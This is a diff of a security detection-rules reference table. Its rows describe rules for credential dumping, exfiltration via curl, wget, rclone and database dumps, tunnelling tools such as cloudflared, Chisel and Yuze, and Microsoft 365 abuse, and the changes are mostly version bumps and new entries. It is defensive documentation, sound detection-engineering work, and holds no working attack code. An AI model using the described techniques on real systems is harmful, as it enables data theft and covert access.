@@ -1392,7 +1418,7 @@ and their rule type is `machine_learning`.
 |<> |This rule detects the creation of Loadable Kernel Module (LKM) configuration files. Attackers may create or modify these files to allow their LKMs to be loaded upon reboot, ensuring persistence on a compromised system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6
-|<> |Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |317
+|<> |Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |318
 |<> |Indicates the creation of a scheduled task. Adversaries can use these to establish persistence, move laterally, and/or escalate privileges.
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: Sysmon], [Resources: Investigation Guide] |None |212 
@@ -1414,7 +1440,7 @@ and their rule type is `machine_learning`.
 |<> |Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |212
-|<> |Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Collection], [Resources: Investigation Guide] |None |212
+|<> |Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. |[Domain: Cloud], [Domain: SaaS], [Domain: Email], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Configuration Audit], [Tactic: Collection], [Resources: Investigation Guide] |None |213
 |<> |Identifies when a user creates a new inbox rule in Microsoft 365 that deletes or moves emails containing suspicious keywords. Adversaries who have compromised accounts often create inbox rules to hide alerts, security notifications, or other sensitive messages by automatically deleting them or moving them to obscure folders. Common destinations include Deleted Items, Junk Email, RSS Feeds, and RSS Subscriptions.
This is a New Terms rule that triggers only when the user principal name and associated source IP address have not been observed performing this activity in the past 14 days. |[Domain: Cloud], [Domain: SaaS], [Domain: Email], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |3 
@@ -1476,6 +1502,8 @@ and their rule type is `machine_learning`.
 |<> |Identifies search queries in SharePoint containing sensitive terms related to credentials, financial data, PII, legal matters, or infrastructure information. Adversaries who compromise user accounts often search for high-value files before exfiltration. This rule detects searches containing terms across multiple sensitivity categories, regardless of the access method (browser, PowerShell, or API). The actual search query text is analyzed against a curated list of sensitive terms to identify potential reconnaissance activity. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Collection], [Resources: Investigation Guide] |None |1
+|<> |Identifies when a new SharePoint Site Administrator is added in Microsoft 365. Site Administrators have full control over SharePoint Sites, including the ability to manage permissions, access all content, and modify site settings. Adversaries who compromise a privileged account may add themselves or a controlled account as a Site Administrator to maintain persistent, high-privilege access to sensitive SharePoint data. This technique was notably observed in the 0mega ransomware campaign, where attackers elevated privileges to exfiltrate data and deploy ransom notes across SharePoint sites. |[Domain: Cloud], [Domain: SaaS], [Domain: Identity], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide] |None |1
+
 |<> |Identifies when a SharePoint or OneDrive site sharing policy is changed to weaken security controls. The SharingPolicyChanged event fires for many routine policy modifications, but this rule targets specific high-risk transitions where sharing restrictions are relaxed.
This includes enabling guest sharing, enabling anonymous link sharing, making a site public, or enabling guest user access. Adversaries who compromise administrative accounts may weaken sharing policies to exfiltrate data to external accounts or create persistent external access paths. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1
 |<> |Identifies file downloads or access from OneDrive or SharePoint using PowerShell-based user agents. Adversaries may use native PowerShell cmdlets like Invoke-WebRequest or Invoke-RestMethod with Microsoft Graph API to exfiltrate data after compromising OAuth tokens via device code phishing or other credential theft techniques. This rule detects both direct PowerShell access and PnP PowerShell module usage for file operations. FileAccessed events are included to detect adversaries reading file content via API and saving locally, bypassing traditional download methods. Normal users access SharePoint/OneDrive via browsers or sync clients, making PowerShell-based file access inherently suspicious. |[Domain: Cloud], [Domain: SaaS], [Data Source: Microsoft 365], [Data Source: Microsoft 365 Audit Logs], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |1
@@ -1550,9 +1578,9 @@ and their rule type is `machine_learning`.
 |<> |Identifies suspicious processes being spawned by the Microsoft Exchange Server worker process (w3wp). This activity may indicate exploitation activity or access to an existing web shell backdoor. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |313
-|<> |Identifies access to email resources via Microsoft Graph API using an first-party application on behalf of a user principal. This behavior may indicate an adversary using a phished OAuth refresh token or a Primary Refresh Token (PRT) to access email resources. The pattern includes requests to Microsoft Graph API endpoints related to email, such as /me/mailFolders/inbox/messages or /users/{user_id}/messages, using a public client application ID and a user principal object ID. This is a New Terms rule that only signals if the application ID and user principal object ID have not been seen doing this activity in the last 14 days. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |3
+|<> |Identifies access to email resources via Microsoft Graph API using an first-party application on behalf of a user principal. This behavior may indicate an adversary using a phished OAuth refresh token or a Primary Refresh Token (PRT) to access email resources. The pattern includes requests to Microsoft Graph API endpoints related to email, such as /me/mailFolders/inbox/messages or /users/{user_id}/messages, using a public client application ID and a user principal object ID.
This is a New Terms rule that only signals if the application ID and user principal object ID have not been seen doing this activity in the last 14 days. |[Domain: Cloud], [Domain: Email], [Data Source: Azure], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |4
-|<> |This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. |[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Resources: Investigation Guide], [Use Case: Identity and Access Audit], [Tactic: Initial Access] |None |5
+|<> |This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user.
|[Domain: Cloud], [Data Source: Azure], [Data Source: Microsoft Graph], [Data Source: Microsoft Graph Activity Logs], [Resources: Investigation Guide], [Use Case: Identity and Access Audit], [Tactic: Initial Access] |None |6
 |<> |Identifies use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |316
@@ -1616,7 +1644,7 @@ and their rule type is `machine_learning`.
 |<> |Identifies multiple logon failures followed by a successful one from the same source address. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |116
-|<> |Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |117
+|<> |Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs] |None |118
 |<> |This rule uses alerts data to determine when multiple unique machine learning jobs involving the same influencer field are triggered. Analysts can use this to prioritize triage and response machine learning alerts. |[Use Case: Threat Detection], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Rule Type: Machine Learning] |None |3
@@ -1626,6 +1654,8 @@ and their rule type is `machine_learning`.
 |<> |Detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |209
+|<> |Identifies a Windows host where two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed starting processes within the same eight-minute window. Legitimate MSP environments may run multiple tools, but this pattern can also indicate compromise, shadow IT, or attacker staging of redundant access. Processes are mapped to a single vendor label so multiple binaries from the same vendor do not inflate the count. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: CrowdStrike], [Data Source: Windows Security Event Logs], [Data Source: Elastic Endgame], [Data Source: Winlogbeat] |None |1
+
 |<> |Windows Credential Manager allows you to create, view, or delete saved credentials for signing into websites, connected applications, and networks. An adversary may abuse this to list or dump credentials stored in the Credential Manager for saved usernames and passwords. This may also be performed in preparation of lateral movement.
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |116
 |<> |This alert identifies assets with an elevated number of vulnerabilities reported by Wiz, potentially indicating weak security posture, missed patching, or active exposure. The rule highlights assets with a high volume of distinct vulnerabilities, the presence of exploitable vulnerabilities, or a combination of multiple severities, helping prioritize assets that pose increased risk. |[Use Case: Vulnerability], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide], [Data Source: Wiz] |None |2
@@ -1804,7 +1834,7 @@ and their rule type is `machine_learning`.
 |<> |Identifies when the Windows installer process msiexec.exe creates a new persistence entry via scheduled tasks or startup. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |5
-|<> |Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne] |None |315
+|<> |Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender for Endpoint], [Data Source: SentinelOne] |None |316
 |<> |This rule detects the creation of Pluggable Authentication Module (PAM) shared object files in unusual directories. Attackers may compile PAM shared object files in temporary directories, to move them to system directories later, potentially allowing them to maintain persistence on a compromised system, or harvest account credentials. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Persistence], [Data Source: Elastic Defend], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |105
@@ -1832,9 +1862,9 @@ and their rule type is `machine_learning`.
 |<> |Detects potential resource exhaustion or data breach attempts by monitoring for users who consistently generate high input token counts, submit numerous requests, and receive large responses. This behavior could indicate an attempt to overload the system or extract an unusually large amount of data, possibly revealing sensitive information or causing service disruptions. |[Domain: LLM], [Data Source: AWS Bedrock], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Potential Overload], [Use Case: Resource Exhaustion], [Mitre Atlas: LLM04], [Resources: Investigation Guide] |None |7
-|<> |Identifies a user account that normally logs in with high volume from one source IP suddenly logging in from a different source IP. This pattern (one IP with many successful logons, another IP with very few) may indicate account takeover or use of stolen credentials from a new location. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |1
+|<> |Identifies a user account that normally logs in with high volume from one source IP suddenly logging in from a different source IP. This pattern (one IP with many successful logons, another IP with very few) may indicate account takeover or use of stolen credentials from a new location. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |2
-|<> |Identifies a user account (often a service account) that normally logs in with high volume using one logon type suddenly showing successful logons using a different logon type with low count. This pattern may indicate account takeover or use of stolen credentials from a new context (e.g. interactive or network logon where only batch/service was expected).
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |1
+|<> |Identifies a user account (often a service account) that normally logs in with high volume using one logon type suddenly showing successful logons using a different logon type with low count. This pattern may indicate account takeover or use of stolen credentials from a new context (e.g. interactive or network logon where only batch/service was expected). |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |2
 |<> |Identifies the modification of the nTSecurityDescriptor attribute in a domain object with rights related to DCSync to a user/computer account. Attackers can use this backdoor to re-obtain access to hashes of any user/computer. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Active Directory], [Use Case: Active Directory Monitoring], [Data Source: Windows Security Event Logs], [Resources: Investigation Guide] |None |109
@@ -1898,12 +1928,16 @@ and their rule type is `machine_learning`.
 |<> |A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. |[Use Case: Data Exfiltration Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |7
-|<> |Detects the use of curl to upload an archived file to an internet server. Threat actors often will collect data on a system and compress it in an archive file before exfiltrating the file back to their C2 server for review. Many threat actors have been seen utilizing curl to upload this archive file with the collected data to do this. Use of curl in this way while not inherently malicious should be considered highly abnormal and suspicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Data Source: Crowdstrike], [Data Source: SentinelOne] |None |4
+|<> |Detects the use of curl to upload files to an internet server. Threat actors often will collect and exfiltrate data on a system to their C2 server for review. Many threat actors have been observed using curl to upload the collected data. Use of curl in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Elastic Defend], [Resources: Investigation Guide], [Data Source: Crowdstrike], [Data Source: SentinelOne] |None |5
-|<> |Detects the use of wget to upload files to an internet server. Threat actors often will collect data on a system and attempt to exfiltrate it back to their command and control servers.
Use of wget in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Auditd Manager], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |1
+|<> |Detects the use of wget to upload files to an internet server. Threat actors often will collect data on a system and attempt to exfiltrate it back to their command and control servers. Use of wget in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Auditd Manager], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |2
+
+|<> |Identifies abuse of rclone (or a renamed copy, e.g. disguised as a security or backup utility) to exfiltrate data to cloud storage or remote endpoints. Rclone is a legitimate file sync tool; threat actors rename it to blend with administrative traffic and use copy/sync with cloud backends (e.g. :s3:) and include filters to exfiltrate specific file types. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Exfiltration], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |1
 |<> |This rule looks for the usage of common data splitting utilities with specific arguments that indicate data splitting for exfiltration on Linux systems.
Data splitting is a technique used by adversaries to split data into smaller parts to avoid detection and exfiltrate data. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |106
+|<> |This rule detects the use of database dumping utilities to exfiltrate data from a database. Attackers may attempt to dump the database to a file on the system and then exfiltrate the file to a remote server. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Exfiltration], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Elastic Endgame], [Resources: Investigation Guide] |None |1
+
 |<> |The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program to install Connection Manager service profiles, which accept installation information file (INF) files. Adversaries may abuse CMSTP to proxy the execution of malicious code by supplying INF files that contain malicious commands. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR], [Data Source: Sysmon], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |109
 |<> |This rule detects the creation or rename of the Doas configuration file on a Linux system. Adversaries may create or modify the Doas configuration file to elevate privileges and execute commands as other users while attempting to evade detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |105
@@ -1952,7 +1986,7 @@ and their rule type is `machine_learning`.
 |<> |This rule detects potential exploitation of CVE-2025-48384 via Git. This vulnerability allows attackers to execute arbitrary code by leveraging Git's recursive clone feature to fetch and execute malicious scripts from a remote repository. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |1
-|<> |Through the new_terms rule type, this rule detects potential HTTP downgrade attacks by identifying HTTP traffic that uses a different HTTP version than the one typically used in the environment. An HTTP downgrade attack occurs when an attacker forces a connection via an older HTTP version, resulting in potentially less secure communication. For example, an attacker might downgrade a connection from HTTP/2 to HTTP/1.1 or HTTP/1.0 to exploit known vulnerabilities or weaknesses in the older protocol versions. |[Domain: Web], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Nginx], [Data Source: Apache], [Data Source: Apache Tomcat], [Resources: Investigation Guide] |None |1
+|<> |Through the new_terms rule type, this rule detects potential HTTP downgrade attacks by identifying HTTP traffic that uses a different HTTP version than the one typically used in the environment. An HTTP downgrade attack occurs when an attacker forces a connection via an older HTTP version, resulting in potentially less secure communication. For example, an attacker might downgrade a connection from HTTP/2 to HTTP/1.1 or HTTP/1.0 to exploit known vulnerabilities or weaknesses in the older protocol versions.
|[Domain: Web], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Nginx], [Data Source: Apache], [Data Source: Apache Tomcat], [Data Source: Traefik], [Resources: Investigation Guide] |None |2
 |<> |This rule detects when a process executes a command line containing hexadecimal characters. Malware authors may use hexadecimal encoding to obfuscate their payload and evade detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Auditd Manager], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |4
@@ -1986,7 +2020,7 @@ and their rule type is `machine_learning`.
 |<> |Identifies suspicious access to an LSASS handle via PssCaptureSnapShot where two successive process accesses are performed by the same process and target two different instances of LSASS. This may indicate an attempt to evade detection and dump LSASS memory for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon], [Resources: Investigation Guide] |None |313
-|<> |Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |111
+|<> |Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |112
 |<> |Identifies the attempt to create a new backdoor user by setting the user's UID to 0. Attackers may alter a user's UID to 0 to establish persistence on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne] |None |113
@@ -2046,7 +2080,7 @@ and their rule type is `machine_learning`.
 |<> |This rule identifies a potential network sweep. A network sweep is a method used by attackers to scan a target network, identifying active hosts, open ports, and available services to gather information on vulnerabilities and weaknesses. This reconnaissance helps them plan subsequent attacks and exploit potential entry points for unauthorized access, data theft, or other malicious activities. This rule defines a threshold-based approach to detect multiple connection attempts from a single host to numerous destination hosts over commonly used network services. |[Domain: Network], [Tactic: Discovery], [Tactic: Reconnaissance], [Use Case: Network Security Monitoring], [Data Source: PAN-OS], [Resources: Investigation Guide] |None |14
-|<> |Identifies a process started by Notepad after opening a Markdown file. This may indicate successful exploitation of a Notepad markdown parsing vulnerability (CVE-2026-20841) that can lead to arbitrary code execution. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |1
+|<> |Identifies a process started by Notepad after opening a Markdown file. This may indicate successful exploitation of a Notepad markdown parsing vulnerability (CVE-2026-20841) that can lead to arbitrary code execution.
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |2
 |<> |Detects potential brute force attacks against a single Okta user account where excessive unique device token hashes are generated, indicating automated tooling that fails to persist browser cookies between attempts. |[Domain: Identity], [Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Credential Access], [Resources: Investigation Guide] |None |210
@@ -2152,8 +2186,12 @@ and their rule type is `machine_learning`.
 |<> |This rule monitors for common command line flags leveraged by the Chisel client utility followed by a connection attempt. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |11
+|<> |Identifies the use of Cloudflare Tunnel (cloudflared) to expose a local service or create an outbound tunnel. Adversaries may abuse quick tunnels (e.g. tunnel --url http://127.0.0.1:80) or named tunnels to proxy C2 traffic or exfiltrate data through Cloudflare's edge while evading direct connection blocking. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |1
+
 |<> |Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems.
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Data Source: Auditd Manager], [Resources: Investigation Guide] |None |215
+|<> |Identifies execution of Yuze, a lightweight open-source tunneling tool used for intranet penetration. Yuze supports forward and reverse SOCKS5 proxy tunneling and is typically executed via rundll32 loading yuze.dll with the RunYuze export. Threat actors may use it to proxy C2 or pivot traffic. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Crowdstrike], [Data Source: Elastic Endgame], [Data Source: Windows Security Event Logs] |None |1
+
 |<> |Identifies known execution traces of the REMCOS Remote Access Trojan. Remcos RAT is used by attackers to perform actions on infected machines remotely. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Windows Security Event Logs] |None |1
 |<> |This rule identifies the creation of multiple files with same name and over SMB by the same user. This behavior may indicate the successful remote execution of a ransomware dropping file notes to different folders. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |214
@@ -2168,7 +2206,7 @@ and their rule type is `machine_learning`.
 |<> |Identifies the execution of the built-in Windows Installer, msiexec.exe, to install a remote package. Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6
-|<> |Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |1
+|<> |Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |2
